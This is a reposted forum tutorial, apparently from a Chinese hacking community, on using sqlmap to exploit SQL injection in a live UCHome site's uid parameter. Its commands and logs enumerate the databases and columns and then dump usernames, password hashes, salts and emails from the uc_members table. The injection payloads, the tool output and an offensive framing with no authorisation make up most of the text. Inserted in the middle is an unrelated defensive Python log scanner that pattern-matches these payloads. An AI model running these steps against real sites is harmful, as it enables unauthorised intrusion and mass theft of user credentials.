Author: adwin

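Dumping databases has been very popular lately. Usually you take over the site first and then dump the data with a script, but sometimes you have no choice but to dump through the injection point, and for that you cannot do without the various injection tools.
Yang Fan wrote up how to dump with Pangolin; the sqlmap dump write-up was originally done by 07. I have used it to dump before, so here is a quick write-up first, heh.
OK, let's demonstrate with a real injection URL (sanitized).
Here is the command log: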

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:06:11

[17:06:11] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:06:11] [INFO] testing connection to the target url
[17:06:13] [INFO] testing if the url is stable, wait a few seconds
[17:06:14] [INFO] url is stable
[17:06:14] [INFO] testing if GET parameter 'uid' is dynamic
[17:06:14] [INFO] confirming that GET parameter 'uid' is dynamic
[17:06:15] [WARNING] GET parameter 'uid' is not dynamic
[17:06:15] [INFO] heuristic test shows that GET parameter 'uid' might be injectable (possible DBMS: MySQL)
[17:06:15] [INFO] testing sql injection on GET parameter 'uid'
[17:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:06:18] [INFO] GET parameter 'uid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[17:06:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:06:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:07:18] [INFO] GET parameter 'uid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:07:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[17:07:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'uid' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---

[17:07:26] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:07:26] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:07:26

 

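Note the text in red: it shows that the uid parameter is injectable. Well, it turns out code formatting and color cannot be combined, so look at this line: GET parameter 'uid' is vulnerable.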
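Seen from the server side, the two payloads sqlmap reports above leave recognizable traces in the web server's access log. The following is an added example, not part of the original post: a small log scanner whose sample log lines, client addresses and rule names are all constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); addresses and sizes are sample values.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2012:17:06:15 +0800] "GET /ucHome/space.php?uid=222 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2012:17:06:18 +0800] "GET /ucHome/space.php?uid=222%20AND%20(SELECT%208621%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,111,115,109,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 731 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.9 - - [01/Jan/2012:17:07:18 +0800] "GET /ucHome/space.php?uid=222+AND+SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
198.51.100.4 - - [01/Jan/2012:17:09:00 +0800] "GET /ucHome/space.php?uid=sleepy HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Hypothetical rule set built from the payload shapes shown in the sqlmap output above.
RULES = {
    "error-based (RAND/GROUP BY)": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based (SLEEP)": re.compile(r"\b(?:and|or)\s+sleep\s*\(\s*\d+\s*\)", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\b", re.I),
    # Weak signal on its own: a client can send any User-Agent it likes.
    "tool user-agent": re.compile(r"\bsqlmap/", re.I),
}
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

def scan(log_text):
    """Return {client_ip: Counter(rule_name -> hits)} for lines matching any rule."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, target, agent = m.groups()
        # Decode %20 and '+' first, otherwise the whitespace-based rules never match.
        query = unquote_plus(target.partition("?")[2])
        for name, rule in RULES.items():
            haystack = agent if name == "tool user-agent" else query
            if rule.search(haystack):
                findings.setdefault(ip, Counter())[name] += 1
    return findings

def suspicious_clients(log_text, min_rules=2):
    """Clients that tripped at least `min_rules` distinct rules, sorted."""
    return sorted(ip for ip, hits in scan(log_text).items() if len(hits) >= min_rules)

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, dict(hits))
```

Requiring several distinct rules per client keeps a harmless value such as `uid=sleepy` from raising an alert.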
Next, list all the databases:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:08:57

[17:08:57] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:08:57] [INFO] resuming injection data from session file
[17:08:57] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:08:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---

[17:08:59] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:08:59] [INFO] fetching database names
[17:08:59] [INFO] the SQL query used returns 4 entries
[17:09:00] [INFO] retrieved: information_schema
[17:09:00] [INFO] retrieved: mysql
[17:09:00] [INFO] retrieved: test
[17:09:00] [INFO] retrieved: ucenter
available databases [4]:
[*] information_schema
[*] mysql
[*] test
[*] ucenter

[17:09:00] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:09:00

 

The red part is the list of databases (there is no color here; it is the part at available databases [4]:). Then select the database and list its tables:

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter --tables

 

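I won't paste the result because there are too many tables. Go straight to listing the column names of the uc_members table (all the UCHome user data is in here, and this is what we want to dump, heh):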

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:11:44

[17:11:44] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:11:44] [INFO] resuming injection data from session file
[17:11:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:11:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FL
on_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---

[17:11:46] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:11:46] [INFO] fetching columns for table 'uc_members' on database 'ucenter'
[17:11:46] [INFO] the SQL query used returns 12 entries
[17:11:46] [INFO] retrieved: uid
[17:11:47] [INFO] retrieved: mediumint(8) unsigned
[17:11:47] [INFO] retrieved: username
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: password
[17:11:47] [INFO] retrieved: char(32)
[17:11:47] [INFO] retrieved: email
[17:11:48] [INFO] retrieved: char(32)
[17:11:48] [INFO] retrieved: myid
[17:11:48] [INFO] retrieved: char(30)
[17:11:48] [INFO] retrieved: myidkey
[17:11:48] [INFO] retrieved: char(16)
[17:11:48] [INFO] retrieved: regip
[17:11:49] [INFO] retrieved: char(15)
[17:11:49] [INFO] retrieved: regdate
[17:11:49] [INFO] retrieved: int(10) unsigned
[17:11:49] [INFO] retrieved: lastloginip
[17:11:49] [INFO] retrieved: int(10)
[17:11:49] [INFO] retrieved: lastlogintime
[17:11:50] [INFO] retrieved: int(10) unsigned
[17:11:50] [INFO] retrieved: salt
[17:11:50] [INFO] retrieved: char(6)
[17:11:50] [INFO] retrieved: secques
[17:11:50] [INFO] retrieved: char(8)
Database: ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(32)              |
+---------------+-----------------------+

[17:11:51] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

[*] shutting down at: 17:11:51

 

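Enough said, let's start dumping. We only need some of the columns; then raise the thread count with --threads and use --start and --stop to set the range of records to dump. Let's dump a few records and see: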

C:\sqlmap>python sqlmap.py -u http://user.xxoo.org/ucHome/space.php?uid=222 -D ucenter -T uc_members -C uid,username,password,salt,email --dump --threads=10 --start=1 --stop=50

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 17:14:22

[17:14:22] [INFO] using 'C:\sqlmap\output\user.xxoo.org\session' as session file
[17:14:22] [INFO] resuming injection data from session file
[17:14:22] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:14:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uid=222 AND (SELECT 8621 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,115,109,58),(SELECT (CASE WHEN (8621=8621) THEN 1 ELSE 0 END)),CHAR(58,119,122,107,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=222 AND SLEEP(5)
---

[17:14:23] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.2.16, Apache 2.2.17
back-end DBMS: MySQL 5.0
[17:14:23] [INFO] fetching columns 'uid, username, password, salt, email' entries for table 'uc_members' on database 'ucenter'
 

[17:14:34] [WARNING] user aborted during enumeration. sqlmap will display partial output
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: ucenter
Table: uc_members
[12 entries]
 
 

[17:14:39] [INFO] Table 'ucenter.uc_members' dumped to CSV file 'C:\sqlmap\output\user.xxoo.org\dump\ucenter\uc_members.csv'
[17:14:39] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\user.xxoo.org'

 

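See, it is all in one CSV file. A CSV file is a file whose records are separated by commas, and it can be imported into Excel, Access, MySQL, whatever; better than Pangolin's HTML, heh. A screenshot: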

 

OK, that's all for now. sqlmap is actually very powerful, and it is cross-platform too.

Reposted from f4ck
